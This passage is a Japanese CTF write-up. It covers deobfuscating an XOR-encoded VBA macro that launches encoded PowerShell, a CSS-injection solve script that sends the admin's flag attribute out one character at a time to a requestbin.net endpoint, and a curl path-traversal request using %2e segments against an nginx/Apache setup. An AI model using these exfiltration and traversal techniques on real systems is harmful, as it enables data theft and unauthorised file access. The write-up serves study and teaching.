    "l3sd196txhtnIlFZyHBc5IKXxHCbTa5hLl3CBpEgbn1I2FFhaEsYCtVyQrkdPmA5X6CuFhjuRacVoM131pMLVE7IQDG717EZ5BdiLOc4pb+5Q1iMAXfQQ6soJrjxM8ZgjzQYO5WuQkQFdfko6QZEa/0QaqhysOozj/sTeoj2wI2A0C/bwV35cV5EXJNOawqbWJCXdwzdsD8QjNhiDYGYFicJIRD5MBshvm1RGv1CZz54n+ziSgGe2vJ6GMy4cWv+i+hy0/shNgvhVcKuJfuPZuFUUHtqD3w07yZKj2ma+iKYCvIRO9nu8lYOQpbbowha1OyfGzx7BJkvJxth3b1xoJaiNMRwQZz/fiC8zvYxTlB0bsIHKR07xgI8gfCDd+NIhwL3YbdAor7ZfHhH3jNhBTykOlyrc/0yLQSTR8dx0BC9QMIerbSCqZ1Q4rUGEPiXIVvXjtrEhnSBTZW4U5uJHfGQbzlVuuRRCUAjyIzGCDHbDCjvEgwbNLLEzqdeJrh9" & _
    "3K1WddVO4bwcKlQb14luWJzBsDwrD8u7vi8LTRIe6A982G0Oygf6+Am9m2GIkp6eSWY3tSF/cOpmuWc+d1RCPzO5eEAm6TWT0ULWZ5QAMD31GObEpVRZ+eoCuDSckd0JvrP2lBSbZKRADL0unq3vhnmyTmflpvtH15ahJ+9mxgHGH2exGX6vgBx17iyx5T4WtBowQsIW310F1QrH6xNfvwM9PLv/3czSXs//jUDSB/AN60pVccuZtfPvp+ZMg6d9l0UKNiWIq7CMKbE7Z7BWWjNEMBPdfGbNzmQULvHXOXpnlZeyNd0ht57x9PljoFDD6N+sEuJ2DRprg7/qNZRJekOAF/VIID2SPgDfCkRhLg+Xq5KgysBO4U5nWKGD0IM1TYcc24pbCY31beUlebiKc2aS7MtxQ+o41wQaJQ8Ys5h13jeNgpUz5Vzc6BGWDUm6+X+Jqu/NK1qUy8Vmb5wXVl6BqFt6Y7yEGWv31QKTiVwyKWbuV+pRRYf3NvAqRX6n" & _
    "d1zFmAyuzoiVe1masPkUUjz2+uacpn8DuVpKrDJF64UDt4yhEeBsLHykecS+/r0pwEBGJdP/Vd/Y3OJ4MFUqnF9UvaYfrFG7trJQepnGH2DE4WTFna70hp9Fxx8LaJMI8lxfwBDxH5Z56kkF+j4hLuzq48vpQNId4tn+rFfFeHwp2GuZrVMkyQ1SVSDW9uUAjWu6ROhPEGwyjnjM2cG6MJQmphOD8bIfjGnOAscgU0d6FN0BHzRtx85xZwO1Vw==")
        cleartext = ""
        For i = LBound(ciphertext) To UBound(ciphertext)
            cleartext = cleartext & Chr(key(i + start) Xor ciphertext(i))
        Next
        unxor = cleartext
    End Function
    (SNIPPED)
    

    xor を使って難読化されている部分があります。まずはこれを復号してみます。

    import re
    from base64 import b64decode
    
    
    key = b64decode(b"rFd10H3vao2RCodxQF2lbfkUAjIr/6DL5qCnyC4p5EA0tEOXFafhhIdAIhum0XulB9+lU9wKRrDSWZ7XHGxFnPVUhqNK2DCnW8bI1MVWYxGhC4q5iFT5EzfCdTcWUu2+X9VTnKuwcOaIxVcmVyVjrWIRz4Dm3kecLNgAU8fZOKcu/XuMXN85ZMKjd3Rv882RBUFmICvacdJ36Yojk5HAwYoBpjjjHydt4NwJisnXgtA3K+2xqGEBfAPmz73uyn7CxCKGt7xPUdc+oRoeY+oObiyzIEPQS3mhWffHsNBhkbrBz1os3xEgxuM3gN6Xa5SE7Zo6G7vMFeKdYops3DGQuyDY60v7KXscOCLxwqeRFC+buIRH69E90JdP7KSC4CDZhxlv/cnX6HWdcWh7UTM7CWqzymtkqm/3fjp76pGxscG40k/M6UjaMnWg++oCkJZFMMenTvaxZ7GwyedlMxbOAtZ+INlBK+tPPIFbG42SRtmJH1e8Uz5p1E7h61vdxBkll3sd196txhtnIlFZyHBc5IKXxHCbTa5hLl3CBpEgbn1I2FFhaEsYCtVyQrkdPmA5X6CuFhjuRacVoM131pMLVE7IQDG717EZ5BdiLOc4pb+5Q1iMAXfQQ6soJrjxM8ZgjzQYO5WuQkQFdfko6QZEa/0QaqhysOozj/sTeoj2wI2A0C/bwV35cV5EXJNOawqbWJCXdwzdsD8QjNhiDYGYFicJIRD5MBshvm1RGv1CZz54n+ziSgGe2vJ6GMy4cWv+i+hy0/shNgvhVcKuJfuPZuFUUHtqD3w07yZKj2ma+iKYCvIRO9nu8lYOQpbbowha1OyfGzx7BJkvJxth3b1xoJaiNMRwQZz/fiC8zvYxTlB0bsIHKR07xgI8gfCDd+NIhwL3YbdAor7ZfHhH3jNhBTykOlyrc/0yLQSTR8dx0BC9QMIerbSCqZ1Q4rUGEPiXIVvXjtrEhnSBTZW4U5uJHfGQbzlVuuRRCUAjyIzGCDHbDCjvEgwbNLLEzqdeJrh93K1WddVO4bwcKlQb14luWJzBsDwrD8u7vi8LTRIe6A982G0Oygf6+Am9m2GIkp6eSWY3tSF/cOpmuWc+d1RCPzO5eEAm6TWT0ULWZ5QAMD31GObEpVRZ+eoCuDSckd0JvrP2lBSbZKRADL0unq3vhnmyTmflpvtH15ahJ+9mxgHGH2exGX6vgBx17iyx5T4WtBowQsIW310F1QrH6xNfvwM9PLv/3czSXs//jUDSB/AN60pVccuZtfPvp+ZMg6d9l0UKNiWIq7CMKbE7Z7BWWjNEMBPdfGbNzmQULvHXOXpnlZeyNd0ht57x9PljoFDD6N+sEuJ2DRprg7/qNZRJekOAF/VIID2SPgDfCkRhLg+Xq5KgysBO4U5nWKGD0IM1TYcc24pbCY31beUlebiKc2aS7MtxQ+o41wQaJQ8Ys5h13jeNgpUz5Vzc6BGWDUm6+X+Jqu/NK1qUy8Vmb5wXVl6BqFt6Y7yEGWv31QKTiVwyKWbuV+pRRYf3NvAqRX6nd1zFmAyuzoiVe1masPkUUjz2+uacpn8DuVpKrDJF64UDt4yhEeBsLHykecS+/r0pwEBGJdP/Vd/Y3OJ4MFUqnF9UvaYfrFG7trJQepnGH2DE4WTFna70hp9Fxx8LaJMI8lxfwBDxH5Z56kkF+j4hLuzq48vpQNId4tn+rFfFeHwp2GuZrVMkyQ1SVSDW9uUAjWu6ROhPEGwyjnjM2cG6MJQmphOD8bIfjGnOAscgU0d6FN0BHzRtx85xZwO1Vw==")
    
    
    def unxor(enc, idx):
        cleartext = ""
        for i in range(len(enc)):
            cleartext += chr(key[i + idx] ^ enc[i])
        return cleartext
    
    
    encs = "CreateObject(unxor(Array(135, 46, 140, 24, 228, 225, 126, 169, 34, 40, 56), 3) & unxor(Array(201, 1), 14)).Run unxor(Array(137, 123, 117, 87, 89, 140, 200, 174, 138, 204, 135, 229, 75, 9, 168, 39, 117, 219, 2, 212, 118, 230, 128, 213, 197, 44, 99, 93, 193, 144, 49, 210, 70, 175, 228, 16, 187, 75, 36, 215, 144, 31, 223, 159, 127, 45, 9, 205, 183, 34), 16) & unxor(Array(199, 228, 3, 153, 81, 192, 25, 128, 137, 147, 136, 23, 7, 80, 224, 108, 203, 255, 197, 21, 174, 66, 117, 184, 52, 127, 71, 19, 183, 239, 29, 155, 18, 223, 159, 241, 35, 183, 202, 179, 22, 101, 99, 100, 54, 218, 32, 33, 142, 198, 175, 159, 29, 205, 110, 154, 65, 22, 247, 152, 91, 192, 108, 145, 58, 203, 25, 158, 99, 37, 128, 229, 54, 60, 38, 178, 134, 208, 68, 38, 39, 99, 76, 155, 56, 147, 53, 156, 203), 66) & unxor(Array(102, 198, 208, 164, 182, 203, 117, 231, 127, 219, 94, 126, 10, 162, 173, 72, 207, 156, 150, 219, 167, 117, 27, 172, 242, 233, 32, 72, 61, 65, 178, 142, 245, 133, 139, 29, 181, 134, 18, 199, 242, 233, 14, 5, 134, 127, 212, 91, 91, 8, 171, 90, 25, 109, 198, 97, 6, 157, 10, 45, 214, 27, 185, 134, 246, 145, 32, 196, 221, 131, 137, 27, 100, 146, 80, 67, 177, 161, 71, 193, 155, 175, 42, 192, 227, 172, 239, 123, 92), 155) & unxor(Array(234, 141, 79, 179, 223, 15, 203, 43, 171, 112, 201, 234, 98, 141, 170, 14, 174, 104, 46, 107, 122, 18, 176, 138, 238, 208, 78, 126, 217, 208, 197, 2, 219, 144, 118, 145, 213, 45, 173, 225, 233, 161, 66, 174, 198, 108, 46, 184, 249, 150, 178, 36, 223, 5, 41, 60, 105, 114, 110, 110, 40, 134, 139, 35, 41, 235, 57, 182, 60, 105, 58, 175, 196, 240, 224, 144, 250, 156, 14, 138, 217, 9, 147, 115, 55, 194, 186, 162, 79), 244) & unxor(Array(209, 193, 20, 114, 189, 230, 8, 167, 240, 61, 224, 242, 135, 166, 38, 7, 87, 151, 117, 148, 46, 97, 158, 117, 106, 143, 40, 126, 199, 26, 83, 196, 211, 16, 152, 203, 123, 22, 248, 60, 127, 38, 179, 12, 140, 170, 29, 148, 133, 77, 82, 213, 53, 92, 146, 151, 236, 151, 74, 37, 118, 16, 28, 157, 49, 18, 131, 195, 167, 133, 54, 214, 12, 248, 32, 108, 36, 131, 65, 250, 97, 12, 26, 10, 182, 16, 34, 15, 10), 333) & unxor(Array(81, 75, 148, 28, 3, 254, 84, 127, 57, 78, 30, 146, 239, 82, 115, 175, 20, 208, 87, 218, 140, 50, 189, 210, 111, 35, 12, 128, 1, 116, 208, 150, 230, 88, 166, 120, 35, 106, 166, 121, 243, 216, 251, 46, 25, 196, 102, 54, 130, 52, 233, 123, 103, 240, 146, 114, 144, 49, 205, 121, 89, 126, 226, 239, 23, 51, 71, 7, 184, 111, 154, 71, 39, 28, 191, 99, 43, 237, 59, 241, 187, 84, 205, 162, 82, 62, 227, 183, 145), 422) & unxor(Array(220, 194, 134, 110, 158, 136, 28, 157, 6, 28, 18, 29, 219, 15, 42, 69, 202, 26, 210, 214, 48, 60, 156, 210, 88, 81, 191, 153, 36, 72, 192, 205, 71, 101, 125, 96, 84, 172, 113, 120, 112, 252, 31, 16, 92, 180, 3, 4, 127, 58, 214, 173, 165, 31, 64, 250, 139, 176, 79, 89, 136, 249, 48, 37, 153, 201, 184, 51, 155, 186, 96, 121, 74, 163, 28, 131, 230, 74, 186, 237, 17, 163, 101, 17, 51, 1, 78, 40, 101), 511) & unxor(Array(173, 96, 11, 202, 44, 219, 158, 69, 217, 56, 179, 84, 118, 152, 185, 163, 20, 92, 3, 211, 142, 226, 92, 27, 150, 191, 222, 95, 105, 58, 87, 200, 109, 108, 90, 41, 190, 252, 39, 215, 215, 150, 117, 140, 19, 0, 206, 174, 60, 83, 253, 136, 153, 112, 28, 55, 54, 1, 131, 65, 74, 92, 97, 135, 64, 80, 192, 181, 183, 54, 130, 9, 197, 65, 182, 38, 196, 1, 248, 217, 155, 50, 57, 1, 135, 114, 53, 68, 126), 600) & unxor(Array(246, 123, 20, 204, 50, 152, 85, 111, 106, 210, 2, 247, 48, 159, 65, 255, 33, 131, 91, 157, 245, 204, 232, 223, 23, 163, 243, 109, 81, 181, 198, 99, 13, 150, 202, 151, 133, 228, 53, 192, 53, 212, 255, 30, 218, 222, 76, 176, 230, 46, 127, 0, 251, 133, 0, 75, 6, 98, 143, 221, 135, 70, 86, 153, 72, 105, 167, 91, 77, 86, 67, 240, 157, 143, 239, 49, 103, 247, 44, 158, 232, 23, 50, 225, 15, 179, 237, 94, 120), 689) & unxor(Array(21, 83, 142, 200, 60, 47, 222, 133, 241, 121, 102, 78, 134, 204, 252, 118, 74, 8, 97, 95, 138, 94, 62, 159, 44, 75, 147, 70, 175, 185, 75, 205, 218, 38, 251, 211, 199, 207, 11, 12, 118, 242, 74, 62, 19, 187, 36, 239, 38, 120, 58, 21, 17, 110, 113, 192, 57, 6, 111, 168, 102, 244, 147, 53, 151, 47, 247, 65, 123, 74, 183, 87, 167, 131, 236, 21, 60, 168, 168, 109, 249, 113, 164, 208, 138, 110, 252, 219, 183), 778) & unxor(Array(220, 77, 218, 41, 229, 2, 88, 252, 106, 253, 236, 187, 215, 59, 193, 15, 32, 150, 231, 159, 48, 149, 160, 224, 111, 182, 39, 147, 118, 135, 109, 38, 249, 118, 63, 205, 247, 94, 37, 175, 100, 222, 164, 108, 71, 245, 42, 113, 7, 181, 87, 188, 28, 71, 172, 75, 129, 136, 82, 8, 238, 65, 105, 125, 243, 190, 156, 168, 181, 28, 153, 190, 197, 25, 147, 84, 135, 79, 188, 11, 18, 30, 138, 195, 228, 177, 172, 230, 163), 867) & unxor(Array(116, 194, 246, 44, 213, 63, 75, 126, 78, 201, 230, 241, 205, 28, 240, 125, 46, 241, 50, 61, 113, 118, 113, 86, 190, 61, 41, 156, 140, 82, 85, 106, 154, 150, 116, 59, 37, 253, 214, 245, 112, 156, 68, 246, 220, 182, 181, 189, 58, 225, 9, 164, 170, 238, 237, 86, 187, 55, 95, 125, 41, 240, 254, 175, 112, 213, 7, 13, 2, 246, 86, 176, 29, 97, 105, 229, 127, 121, 158, 77, 51, 32, 116, 104, 213, 158, 211, 231, 161), 956) & unxor(Array(129, 43, 134, 12, 8, 25, 228, 210, 145, 230, 100, 15, 197, 93, 157, 207, 26, 89, 220, 180, 84, 164, 102, 26, 249, 193, 34, 39, 225, 173, 136, 48, 2, 189, 79, 149, 126, 91, 99, 100, 89, 230, 239, 55, 238, 118, 200, 215, 212, 103, 180, 29, 169, 169, 86, 253, 76, 43, 205, 184, 10, 200, 239, 162, 140, 127, 45, 214, 133, 132, 32, 46, 221, 66, 49, 28, 237, 233, 29, 55, 34, 233, 243, 91, 27, 182, 146, 58, 210), 1045) & unxor(Array(221, 59, 115, 92, 39, 169, 26, 171, 5, 50, 197, 131, 119, 184, 107, 4, 29, 192, 53, 48, 132, 208, 65, 239, 155, 255, 215, 11, 24, 223, 136, 184, 64, 53, 126, 130, 187, 163, 164, 231, 37, 66, 251, 28, 11, 234, 2, 4, 164, 226, 66, 129, 205, 228, 64, 161, 54, 125, 62, 224, 56, 131, 134, 191, 223, 120, 130, 17, 7, 109, 154, 190, 7, 142, 154, 136, 163, 62, 125, 20, 97, 205, 30, 51, 252, 229, 116, 237, 29), 1134) & unxor(Array(250, 244, 208, 17, 50, 212, 135, 122, 49, 134, 155, 37, 131, 204, 239, 166, 215, 221, 49, 134, 92, 63, 41, 197, 73, 176, 26, 30, 134, 119, 176, 123, 215, 56, 159, 8, 66, 175, 127, 67, 73, 174, 128, 162, 142, 209, 1, 136, 92, 160, 147, 191, 233, 99, 132, 42, 11, 107, 188, 42, 221, 194, 18, 107, 174, 79, 16, 20, 104, 155, 183, 188, 119, 207, 27, 251, 1, 131, 14, 91, 61, 115, 233, 57, 143, 178, 128, 246, 87), 1223) & unxor(Array(214, 95, 231, 84, 214, 176, 235, 78, 206, 44, 143, 68, 150, 97, 49, 48, 56, 82, 156, 68, 43, 117, 63, 134, 143, 30, 38, 64, 222, 22), 1312)"
    
    tmp = ""
    for m in re.findall(r"unxor\(Array\(([0-9, ]*)\), ([0-9]*)\)", encs):
        tmp += unxor(list(map(int, eval(f"[{m[0]}]"))), int(m[1]))
    print(tmp)
    WScript.Shellpowershell -e LgAoACcAaQBlAFgAJwApACgAbgBFAHcALQBvAGIAagBFAGMAdAAgAFMAWQBzAHQAZQBNAC4ASQBvAC4AUwB0AFIAZQBBAE0AcgBlAGEAZABFAHIAKAAgACgAIABuAEUAdwAtAG8AYgBqAEUAYwB0ACAAIABTAHkAcwB0AEUATQAuAEkATwAuAEMATwBNAFAAUgBFAHMAcwBpAE8ATgAuAGQAZQBmAGwAYQBUAEUAUwB0AHIAZQBhAE0AKABbAEkAbwAuAE0AZQBtAG8AUgB5AHMAVABSAEUAQQBNAF0AIABbAHMAWQBzAFQAZQBNAC4AYwBPAG4AdgBFAHIAVABdADoAOgBmAFIATwBNAEIAQQBTAEUANgA0AFMAVAByAGkAbgBnACgAIAAnAGIAYwA2ADkAQwBzAEkAdwBHAEkAWABoAFAAVgBmAHgARwBSAHcAVQBMAEwAUwBrAGsAcwBsAEIAQgBYADkAQQBVAEIAdwBVAHAAOQBBAG0AbgA3AFEAUQBtADUAcQBrAFIAcABIAGUAdQB5ADAANgBPAHAAOABIAHoAbwB1AHkATQBFAEEAdgA2AEMAWQBRAEUATABSADUASQBKAHcAVwA4AHcARQBsAFoARgBoAFcAZABlAE4AaABCAGsAZgBNAFYATABRAHgAegBnAE0AOQBaAE0ANABGAFkAMQBVADMAbAAxAGMAWQAvAFUAaQBFAGQANgBDAHIAMwBYAHoAOQBEAG4ARQBRAHYARwBDAEMAMwBYAEsAbQBGAEYAUABpAGsAYQBjAGkAcQBVAFMASQByAFIASgBwAHcAKwBOAGIAeQBoAE8AWgBhAHYAMABTADcATQBsAGsAdwB6AHYAUwArAHoAbwBPAHoARQA0AEwAcAByAFcAWQBTAHAAdgBVAHYASwBWAGoAZQBCAE8AQQBzAHkAMAA5AFIAdgB2AEcAOQB6ADkAMABhAGEAeABGADYAYgB1ADYARgBsAEEANwAvAEUATwAyAGwAZgB5AGkAegBoAEQAeQBBAFEAPQA9ACcAKQAsACAAWwBzAFkAUwB0AEUATQAuAGkAbwAuAEMATwBNAFAAUgBlAFMAUwBpAG8ATgAuAGMATwBtAHAAcgBlAHMAUwBpAE8ATgBtAE8AZABFAF0AOgA6AEQAZQBDAG8AbQBQAHIARQBTAFMAKQAgACkALABbAHMAeQBzAFQARQBtAC4AVABFAFgAdAAuAGUAbgBjAE8AZABJAE4ARwBdADoAOgBBAHMAYwBpAEkAKQAgACkALgByAGUAYQBEAFQAbwBFAE4ARAAoACkA

    -e 以降のもの (base64encode されている) を powershell で実行しているようです。 base64decode をかけると、

    b".('ieX')(nEw-objEct SYsteM.Io.StReAMreadEr( ( nEw-objEct  SystEM.IO.COMPREssiON.deflaTEStreaM([Io.MemoRysTREAM] [sYsTeM.cOnvErT]::fROMBASE64STring( 'bc69CsIwGIXhPVfxGRwULLSkkslBBX9AUBwUp9Amn7QQm5qkRpHeuy06Op8HzouyMEAv6CYQELR5IJwW8wElZFhWdeNhBkfMVLQxzgM9ZM4FY1U3l1cY/UiEd6Cr3Xz9DnEQvGCC3XKmFFPikaciqUSIrRJpw+NbyhOZav0S7MlkwzvS+zoOzE4LprWYSpvUvKVjeBOAsy09RvvG9z90aaxF6bu6FlA7/EO2lfyizhDyAQ=='), [sYStEM.io.COMPReSSioN.cOmpresSiONmOdE]::DeComPrESS) ),[sysTEm.TEXt.encOdING]::AsciI) ).reaDToEND()"

    何らかの文字列に対して base64 decode -> deflateStream をかけています。 zlib で圧縮されているらしいのでもとに戻してみます。

    import zlib
    
    
    decompressed = zlib.decompress(b64decode("bc69CsIwGIXhPVfxGRwULLSkkslBBX9AUBwUp9Amn7QQm5qkRpHeuy06Op8HzouyMEAv6CYQELR5IJwW8wElZFhWdeNhBkfMVLQxzgM9ZM4FY1U3l1cY/UiEd6Cr3Xz9DnEQvGCC3XKmFFPikaciqUSIrRJpw+NbyhOZav0S7MlkwzvS+zoOzE4LprWYSpvUvKVjeBOAsy09RvvG9z90aaxF6bu6FlA7/EO2lfyizhDyAQ=="), -15)
    b'echo "Yes, we love VBA!"\n\n$input = Read-Host "Password"\n\nif ($input -eq "FLAG{w0w_7h3_3mb3dd3d_vb4_1n_w0rd_4u70m471c4lly_3x3cu73d_7h3_p0w3r5h3ll_5cr1p7}") {\n  Write-Output "Correct!"\n} else {\n  Write-Output "Incorrect"\n}\n\n'

    フラグの文字列と一致しているかを比較していることがわかりました。

    FLAG{w0w_7h3_3mb3dd3d_vb4_1n_w0rd_4u70m471c4lly_3x3cu73d_7h3_p0w3r5h3ll_5cr1p7}

    Web

    Styled memo

    19 solves

    css をアップロードすることができるノートアプリです。 css を使った何かが鍵となりそうな気配がするのでググってみると CSS injection というものが存在しました。この手法についてはこのスライドがわかりやすかったです。各タグの属性値の値によって query 先を分岐させるような css を書くことで、属性値を1文字ずつリークできます。今回の問題ではフラグが書かれたノートは属性値として与えられているので css からアクセス可能です。

    しかし css のアップロードはできても、 admin の css を設定できるわけではないためなんとかする必要があります。 css のアップロード先のリンクを見ると、 /media/USERNAME/FILENAME となっています。デフォルトの FILENAMEexample.css です。 ここで自分の USERNAMEADMINNAME/ と変更してみます。するとアップロードした css は /media/ADMINNAME//FILENAME にアップロードされます。 FILENAMEexample.css に指定すれば、 admin がアクセスする css と path が一致するため、 admin が参照する css そのものとなります。これで任意の css を admin に踏ませることができます。

    以上をもって css を作ってアップロードして admin に踏ませることで1文字ずつリークできるようになります。これを繰り返せばフラグが入手できます。 本当は自動化したかったのですが requestbin.net で query parameter をいい感じに取ってくるのが面倒だったため、1文字ずつ人力で回しました…また python の requests が上手く動作せず 403 が返ってきてしまうため selenium を使いました。 csrf 周りの問題だと思うのだけれど、上手く設定できず…

    solve.py
    import os
    from selenium import webdriver
    import string
    
    
    sessionid = "951pwbd8amj5ftk1ptzprestm550n3bq"
    user_url = "https://styled-memo.web.wanictf.org/user"
    crawl_url = "https://styled-memo.web.wanictf.org/crawl"
    css_path = os.getcwd() + "/example.css"
    
    css_template = """button[data-title="FLAG"][data-content^="{value}"] {{
        background-image: url("https://requestbin.net/r/h0ua2hop?value={value}");
    }}
    """
    
    driver = webdriver.Chrome()
    
    def checker(prefix: str):
        with open(css_path, "w") as f:
            for c in set(string.ascii_letters + string.digits + string.punctuation) - set("'"):
                css = css_template.format(value=prefix+c)
                f.write(css)
    
        driver.get(user_url)
        driver.add_cookie({"name": "sessionid", "value": sessionid})
        driver.get(user_url)
        driver.find_element_by_id("id_css").send_keys(css_path)
        driver.find_element_by_xpath("//button[@class='btn btn-primary']").click()
        driver.get(crawl_url)
    
    
    # 手動で1文字ずつ追加していく…
    flag = "FLAG{"
    checker(flag)
    driver.quit()

    FLAG{[email protected]}

    traversal

    36 solves

    ヒントに「設定に違和感」と書いてあったため、設定ファイルをひたすら眺めます。怪しい設定が2つ見つかりました。

    1つ目はここ。

    lb/conf/default.conf
    server {
        listen       80;
        listen  [::]:80;
        server_name  localhost;
        merge_slashes off;
    
        location / {
            proxy_pass http://traversal-web:80;
        }
    }

    merge_slashes というのはデフォルトでは on らしいですが、わざわざ off にしています。これは URL の path 中に slash が連なっているときに1つにするかしないかを決める設定みたいです。これが off の場合、 directory traversal が使える可能性があります。

    2つ目の怪しい設定はここ。

    web/httpd.conf
    <IfModule alias_module>
        (SNIPPED)
        ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/"
    </IfModule>
    

    /cgi-bin/ にアクセスすることが /usr/local/apache2/cgi-bin/ にアクセスすることに繋がります。

    以上2点を組み合わせると、 /cgi-bin///////../../../../../flag.txt のような path にアクセスすれば flag.txt にアクセスできそうです。しかし404が返ってしまいます。 原因がわからずあれこれ試してみると、 . ではなく %2e を使えば上手くいきました。なんで

    curl https://traversal.web.wanictf.org/cgi-bin///////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/flag.txt

    FLAG{n61nx_w34k_c0nf16_m3r63_5l45h35}

      ;